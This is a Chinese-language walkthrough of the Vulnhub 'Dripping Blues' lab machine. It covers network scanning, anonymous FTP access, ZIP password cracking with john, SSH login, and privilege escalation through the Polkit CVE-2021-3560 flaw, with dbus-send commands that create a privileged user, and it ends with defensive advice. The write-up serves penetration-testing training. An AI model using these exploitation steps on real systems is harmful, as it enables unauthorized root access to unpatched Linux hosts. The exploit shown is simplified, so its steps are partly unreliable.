vulnhub系列4——Dripping Blues
字数 980 2025-08-12 11:34:31
Dripping Blues 靶场实战指南
靶场概述
Dripping Blues 是 Vulnhub 上的一个渗透测试靶场,难度中等,涉及 FTP 匿名登录、文件包含漏洞、密码破解和权限提升等技术点。
环境准备
- 靶机 IP: 192.168.56.109
- 攻击机: Kali Linux 或其他渗透测试系统
渗透测试步骤
1. 信息收集
网络扫描
netdiscover -r 192.168.56.0/24
nmap -sV -Pn -sC 192.168.56.109
发现的服务
- FTP 服务(允许匿名登录)
- HTTP 服务(80端口)
2. FTP 匿名登录
ftp 192.168.56.109
使用用户名 anonymous 和空密码登录。
下载文件
在 FTP 中发现一个需要密码的 ZIP 压缩包:
get respectmydrip.zip
3. Web 目录枚举
发现三个重要文件:
- robots.txt
- dripisreal.txt
- /etc/dripispowerful.html
4. ZIP 密码破解
使用 zip2john 和 john 破解 ZIP 密码:
zip2john /root/Desktop/respectmydrip.zip >> pass.txt
john /root/Desktop/pass.txt
成功获取密码: 072528035
5. 解压 ZIP 文件
unzip respectmydrip.zip
输入密码 072528035 解压文件。
6. 分析解压文件
查看解压后的文件内容,可能包含 SSH 凭据或其他有用信息。
7. SSH 登录
从解压文件中获取账号密码后:
ssh username@192.168.56.109
8. 权限提升
使用 CVE-2021-3560 漏洞进行提权:
漏洞利用步骤
- 确保系统满足漏洞条件(Polkit 版本受影响)
- 执行漏洞利用代码:
# 示例利用代码(需根据实际情况调整)
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:attacker string:"Attacker" int32:1
- 为新创建的用户设置密码:
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$salt$hashedpassword' string:AskPassword
- 切换到 root 权限:
su - attacker
sudo -i
关键点总结
- FTP 匿名登录:总是检查 FTP 是否允许匿名访问
- 密码保护文件:使用 zip2john + john 组合破解 ZIP 密码
- Web 目录枚举:robots.txt 和非常规路径可能泄露敏感信息
- 权限提升:CVE-2021-3560 是 Polkit 提权漏洞,影响多个 Linux 发行版
防御建议
- 禁用 FTP 匿名登录
- 对敏感文件使用强密码
- 及时更新系统补丁,修复已知漏洞
- 限制 Polkit 等系统服务的权限
参考资源
- CVE-2021-3560 详细说明:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3560
- Polkit 漏洞利用指南:https://github.com/berdav/CVE-2021-3560